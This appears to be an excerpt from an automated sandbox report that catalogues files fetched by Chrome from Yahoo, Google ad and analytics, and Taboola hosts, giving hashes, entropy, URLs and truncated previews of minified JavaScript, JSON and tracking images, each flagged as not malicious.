                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0715765358058125
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:oR1sjwHFEUwoL6yhc3XGvRqKQTZebCv531ABakHFsn+UHxvLk6L:csma66dMQK6ZebMFwJs++Tkq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F03C9FBB907E22FAF0E7BD4BE205BE49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:49DE683474BCA65C6939DE1FC3156CE161A02D31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A71BE7522F3340EF4861F7E219F28C3C27E93691931833DA985FF68A6E8A2A19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B229E8F24B52C2910DEDFA330E3320DE8FC5737006D7A4159DF1A414F8F3E8714754C4DFB1612FCE14E085B92551D001D5E3975B085090788E7D8402BDDE69C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/datetimeUtils.BKCxat1F.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:function m(e,t){if(!t)return"";const n=1e3,o=60*n,s=o*60,c=s*24,l=c*31,u=l*12,a=Date.parse(t)-Date.now();let i="year",r=Math.ceil(a/u);const f=Math.abs(a);return f<o?(i="second",r=Math.ceil(a/n)):f<s?(i="minute",r=Math.ceil(a/o)):f<c?(i="hour",r=Math.ceil(a/s)):f<l?(i="day",r=Math.ceil(a/c)):f<u&&(i="month",r=Math.ceil(a/l)),e.format(r,i)}function D(e="en-US",t={}){const n=new Intl.RelativeTimeFormat(e,{numeric:"auto",style:"long",...t});return function(s){return m(n,s)}}function T(e,t="en-US",n={}){return D(t,n)(e)}function h(e){const t=new Date,n=new Date(e);return!(t.getDate()===n.getDate()&&t.getMonth()===n.getMonth()&&t.getFullYear()===n.getFullYear())}function M(){const e=new Date,t=g(e)?-4:-5;e.setHours(0,0,0,0);const n=e.getTime()+e.getTimezoneOffset()*6e4;return new Date(n+t*36e5).getTime()}function g(e){const t=new Date(e.getFullYear(),0,1).getTimezoneOffset(),n=new Date(e.getFullYear(),6,1).getTimezoneOffset();return Math.max(t,n)!==e.getTimezoneOffset()}export{M as a,T as f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):122423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.305704376297342
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:r4g3D3Aeq/dcMxv4IczaOil5dHpTGQHamSWiEmP72jdHrN42WdO7deK5YECDPE5W:y2D7udLN42WdO7deKw60jAeYv7k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6351528876ADA81CA05ADCFC0BC8EF9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:553E048314BE144063AB59D01E35586F1C65228D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:498E5C1BF76F15E724968BE0AEE53BF4269B550BE0FE23A518AD0DFCB5A501B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3F4A87F9FBE5143C7639CACE8BD85BCC94C5BCC05F34173D78C641712D52CB046C9C14CC821FECD2FA2426D0C899647A13B31629589C1C15262B9D442DF62A64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/c/553e048.caas-news_web.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("CAAS",[],t):"object"==typeof exports?exports.CAAS=t():e.CAAS=t()}(self,(function(){return function(){var e,t,s,o,a={"./node_modules/@vzmi/caas-static/src/lazy/js/index.js":function(e,t,s){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s("./node_modules/@vzmi/caas-static/src/util/js/index.js");const a="loading"in HTMLImageElement.prototype,i="data-caas-lazy-loading-init";let n,l;function r(e,t){return e.nodeName.toLowerCase()===t}function d(e,t){const s=e._util,{pendingClass:a}=e.options;return()=>{if((0,o.elementInView)(t,e.options,s._viewport)){const o=s.elements.indexOf(t);e.load(t),s.elements.splice(o,1),s.count--,0===s.count&&e.destroy()}(0,o.removeClass)(t,a)}}function c(e){const t=e._util,{pendingClass:s,successClass:i,timeout:n}=e.options;for(let l=0;l<t.count;l++){const c=t.elements[l],m=a&&r(c,"img"),u=!m&&(0,o.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):120478
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.560095299062624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:sf0KBYfYHj0FHRE8QPYDY9jqvq7y8PbXYcYyjdBCkJgW:sFBYfYHj0p4PYDY9jKqRXYcYyjL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8A7BA4B1475BF494439A00F84CA7F9AD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8E979204E5986966F7104F4356C042A0C36FA200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B849B012451CD2302E54EC908591D5084E4B2216147092B125A59FD5ED88A40F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F54F70FCD871415D0498864798B848BC4088327F78EB993D4C9D5543F1F53800245BBCFC93B759B52449A5944F7FF8DDD8D7928E2047F80CE3284B278E437316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://www.yahoo.com/caas/content/article/?uuid=53c53b29-181a-3610-abb6-7342d7ac1416,c0d99429-8a1e-3aa0-b598-bde24fb0d1b7,7fcfc158-f6e5-3b23-a4e2-e608b9d58220&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;entertainment","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000MOZxjQAH;revsp:billboard_547;lpstaid:53c53b29-181a-3610-abb6-7342d7ac1416;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Plastic_surgery;Cardi_B;Hourglass_figure\" ctopid=\"1035500\" hashtag=\"news;1035500\" rs=\"lmsid:a0a6T00000MOZxjQAH;revsp:billboard_547;lpstaid:53c53b29-181a-3610-abb6-7342d7ac1416;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"entertainment","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=cardi-b-shows-off-her-170246496","canonicalSite":"entertainment","canonicalUrl":"https://www.billboard.com/music/music-news/cardi-b-slams-plastic-surgery-rumors-photo-video-1235794470/","categoryLabel":"Celebrity","commentsAllowed":true,"commentsCount":0,"contentMeta":{"adPostions":{"photos":{},"INARTICLE":5},"bodySlots":{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.645352322966807
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YQ3/eHipZSQkCsWcZRUzToRTRBeJ3LwWLW6n:YQ3LsXy/My3LwMW6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:055E6701ABCF5BEE38F6CACFED5B720A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E37705E5021AD7CAD92FBF60CB386ED8482C6789
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EEA9E6FECFB1B55A128FC50B8F51E5D039EC369C4B64FEF377A2E8C809692DAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:83CBBFD51C6299CADBEA59271E666AE654685A951D6905001868EEBD4BFD626844A9ADB9A8225CD84D9D5A7D06AE360F98E224186AE04E33EFE09832A4211849
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://api.taboola.com/1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66bae12e060a4a66536126f26e6cf8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"user":{"id":"2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9","isNewUser":false}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2402
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.749351816749042
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:D8M000NIxT7F2KSlWLurYa3rTcyh6pPB1RjfrjoCaBWvpZ:D8M007T7ioUA06ppDU6P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2E3D1CB92BFB8542BE1AFB8679C4D994
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9A50F84E17FC9FDFE04AACF6F1340F0E5EB3FEEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:214146DE3EB7957C6FFEAF639E0C04FC5A4E9B9F127E263D8139B3134CD44DF5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E8311EFD8DB347E255443291D5CC82FB0ECD1BEF75443862FF72C717B3A66C70F8FCDB5A7BBF855EB465FA8E99812AB1259E6F7888893A80E431D5D75AD892EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............PLTEGpL2]....2\.3].??.3\....3\.UU....2].2].$..2]....3\..U.3\.2[.2\.3[.3\.4_.3^....0\.3\.3].UU.3].4_..U.3_.1\.3].4^..\.3\.3^.2\.2].3f.3^.3\.2].4].2\.3\.2\.3^.2^.3^.4\.3`.2^.2^.3].3].3\.2\.2].3].1].2].1].3].4_.4^.3\.2\.1Y.0a..\.3\.4_.3_.3].4^.3^.-[.3].3_.4^.3^.1\.3\.2\.3].1^.1].4].1X.0a.4_.4^.3^.4_.2[.2\.3_.3\.5].4].3].2].4].2].3]....4^..../Z.......5_.6_.*V.6`.]........%R.5^.5a.......6b.7d.5a.0[.'T.-Y.'S.)U.7d.-X.2\.8a.,W.6c.4^.3^.&R.5_.4].+W.4`.5`.(T.5`.6c.7d....&S.6c....7c....3].Kp.Jo.....\}.4^.`..d.._..Sw....{..4_...(U.......=e.(U..........Wy.Ru.q.....4_.3^...........7e........l.....+V...7c...v......X.7`.6_.........Fk.v...5b.:c.......:b....0Z....(T.......6d.............Fl.Gm.........k....4_..g....ltRNS.....................(...)......a....w..A..]..^..mk.......?.b.....,......w........bb.*...kn.x?x...I..]....IDATX.W.W.Y.~!.L.E.....H..zX{.m{.u....w.@. t.%..V,.....6t..{...a.L2af2.....93..w.{.~...."@?^......$.)I.....P...x.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5070)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5071
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.154279591983011
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:yCCs0XQaOSvruAe49pph485P1z9N8fxuOh7Snxqqcp3Dr:KzjrPeqrhBWGD+Dr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4B4CAA230C1D0883BB6B688B56177440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6E7835E19976DE3C78B4DA88D688A9B4BB25E3DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E197B1B3E813A5D2282D5AA19FFEC0CCF1B4F62C0B09BEE72B4B31FBC58CDEA4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:75EFF1EA2F3EEC2CA7258AB4853AF8F26AA82CBB6B1226C3EF97BC8A7AF61D6BD1DCD9460E593F20AC15A11E6183B35A609C7C44AC4606A18D44CA2DA45BE5D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var m=Object.defineProperty;var p=(e,t,i)=>t in e?m(e,t,{enumerable:!0,configurable:!0,writable:!0,value:i}):e[t]=i;var r=(e,t,i)=>(p(e,typeof t!="symbol"?t+"":t,i),i);const n={inert:":not([inert]):not([inert] *)",negTabIndex:':not([tabindex^="-"])',disabled:":not(:disabled)"};var E=[`a[href]${n.inert}${n.negTabIndex}`,`area[href]${n.inert}${n.negTabIndex}`,`input:not([type="hidden"]):not([type="radio"])${n.inert}${n.negTabIndex}${n.disabled}`,`input[type="radio"]${n.inert}${n.negTabIndex}${n.disabled}`,`select${n.inert}${n.negTabIndex}${n.disabled}`,`textarea${n.inert}${n.negTabIndex}${n.disabled}`,`button${n.inert}${n.negTabIndex}${n.disabled}`,`details${n.inert} > summary:first-of-type${n.negTabIndex}`,`iframe${n.inert}${n.negTabIndex}`,`audio[controls]${n.inert}${n.negTabIndex}`,`video[controls]${n.inert}${n.negTabIndex}`,`[contenteditable]${n.inert}${n.negTabIndex}`,`[tabindex]${n.inert}${n.negTabIndex}`];function h(e){(e.querySelector("[autofocus]")||e).focus()}function y(e){cons
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1620)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.329855816477348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:c81aOTRVh9ThTT8LT7LbSZNW5EqxPlg58JeS6pOYnN8LiKkknE1DXRksI0fS5:rMOTnJ8zHVEqxPC58QS6pxBK7nElRksm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6D969B0F81242D36A88FA5922140249E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:404E22A5E111FA02CFB626D45B201E598B425FA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7619B789D24BE9FCDC5B3A1DB864CA3B8194FA054D5881EEEA7F0D0F8A171705
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9C5CF9A3BC9170A9548DC8E36D349D2F751A3238177C60907F54720BF5F94736634DB4A1C12839F5EE5D0D2654F36F4CA87294ADD62CEDEA8709C203A832F61C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";var c=window,t=c.document,e="*null",s=[1,9,10];function n(t,e,s,n){if(!t||!e||"function"!=typeof c[t])return n();try{c[t](e,s,(function(c,t){n(c,t)}))}catch(c){n()}}c.COMSCORE={_version:"1.6.6",beacon:function(r){n("__uspapi","getDoNotSell",1,(function(p,f){n("__tcfapi","getTCData",2,(function(n,o){var i=JSON.parse(JSON.stringify(r||{})),_=n&&n.gdprApplies||!1,a=c.YAHOO&&c.YAHOO.comscore||{},d=c.rapidInstance&&c.rapidInstance.getRapidAttribute;if(i.c1=i.c1||"2",i.c2=i.c2||a.c2||"7241469",i.c5=i.c5||d&&d("spaceid"),i.c7=i.c7||t.location.href,i.c8=i.c8||t.title||"",i.c9=i.c9||t.referrer||"",i.c14=i.c14||a.c14||"-1",i.gdpr=_?1:0,i.gdpr_consent="",_){if(o&&n){var u=s.every((c=>!0===n.purpose.consents[c])),l=!0===n.vendor.consents[77];i.cs_ucfr=u&&l?1:u&&l?"":0,i.gdpr_consent=n.tcString||""}}else f&&p&&"boolean"==typeof p.doNotSell?i.cs_ucfr=p.doNotSell?0:1:i.cs_ucfr=0;var g=i.cs_fpid||a.cs_fpid;if(g)if(i.cs_ucfr){var m=i.cs_fpdm||a.cs_fpdm;m&&m!==e?(i.cs_fpdm=m,i.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3715)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.414780010115393
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:XDMSRYLoehCVVNCr0zfMwhFs0pl/Jbdz8X:XDlRYLqVVNCwzEwhFxpl/J6X
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:99D1A437747B43C2098B30363D2B0FEE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AA35CE605B3225C5BC7DCE49FF0921203F571776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2FE8DD267B3D1545D0F2302A62E51B317F8513C1226D4C60B8958886E2219047
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A7BF83FF9E28D5C17C07542997726E284E6446510190D9F086E24B415B21F4BB8ECA03A1E3D3AF5FCBE3E4004E897CFE56DBF07CBE0D8AEC06F6D3EF715B87E2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/StarRating.svelte_svelte_type_style_lang.CKEtkus0.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var o={};function g(t){return t[t.length-1]}const x=60*new Date().getTimezoneOffset()*1e3,F=/(\d+)px/i;function h(t){return t==="ytd"?h(`${new Date().getMonth()+1}mo`):g(t)==="d"?parseInt(t,10)*390:t.slice(-2)==="mo"?22*parseInt(t,10)*390:g(t)==="y"?255*parseInt(t,10)*390:void 0}o.TZ_OFFSET_IN_MS=x,o.copyIfUndefined=function(t){for(var e=arguments.length,r=new Array(e>1?e-1:0),n=1;n<e;n++)r[n-1]=arguments[n];return r.forEach(i=>{i!==null&&typeof i=="object"&&Object.keys(i).forEach(m=>{i[m]!==void 0&&(t[m]=i[m])})}),t},o.estimateNumWidth=function(t,e){return Math.ceil(t.measureText(e.replace(/\d/gi,"0")).width)},o.extractFontSize=function(t){return+F.exec(t)[1]},o.getInterval=function(t,e){const r=t/2,n=h(e);if(!n)return"1mo";const i=n/r;return i<1?"1m":i<2?"2m":i<5?"5m":i<15?"15m":i<30?"30m":i<60?"1h":e!=="ytd"&&i<90?"90m":i<390?"1d":i<1950?"1wk":"1mo"},o.isNumber=function(t){return typeof t=="number"},o.last=g,o.reset=function(t,e,r){let n=arguments.length>3&&arguments[3]!==void 0?arg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2222)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.396200966239423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:/xEVUMByh/fa6cSOUkxHT72sDWB75/0D0PmfDpl2yk/Z7SNJQ0Wu3PI3Prx/ttoI:hRS6cbHTi7iFkOvLbAN9gzRON1Rxwi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1C33A4D6D63C7E6E38CC72E6245FC107
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:19EA40DED1698EC0617604DC3E09897F7A8FF640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:435DB380C9936C0970DCD3D9941EAB6AEC2FCF2A38C3E2B4E02D957E8E76BD1F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CA55321C3C847819553238850525E59C6ED5C37BCA116358D5080971037E56A3407D256B6A78DBE38F4B91CC97E62D899296C620F80701598983BA0624E086E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://tpc.googlesyndication.com/sodar/Q12zgMmT.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.p("Symbol",function(a){if(a)return a;var b=function(f,g){this.Aa=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.Aa};var c="jscomp_symbol_"+(1E9*Math.random()>>>0)+"_",d=0,e=function
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (42749)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):96840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4845271612727995
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:28H+8OwWGr4nicx4+X7oT+nRgQw+TwyD4rCiht7M:28HGwWGsFXE6gvPhtA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6DC3CB48CC6628FDA236043496215404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B862993A8B9DF28D47A7FDFCE9C98D25DF4DF35E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:654314DAA157C59FC5694FC92385BEA61702CC5FE278C4AAE8559698DB13D0B1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E13D9910890AE8600BF25B8494DBDE4F86F9CAA47BF083034059760833059859493AE119EF010378B7AF641D1B73C957FC9E9F8D6345CD4F1ABDF5C787184D81
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/ss/analytics-3.57.2.js
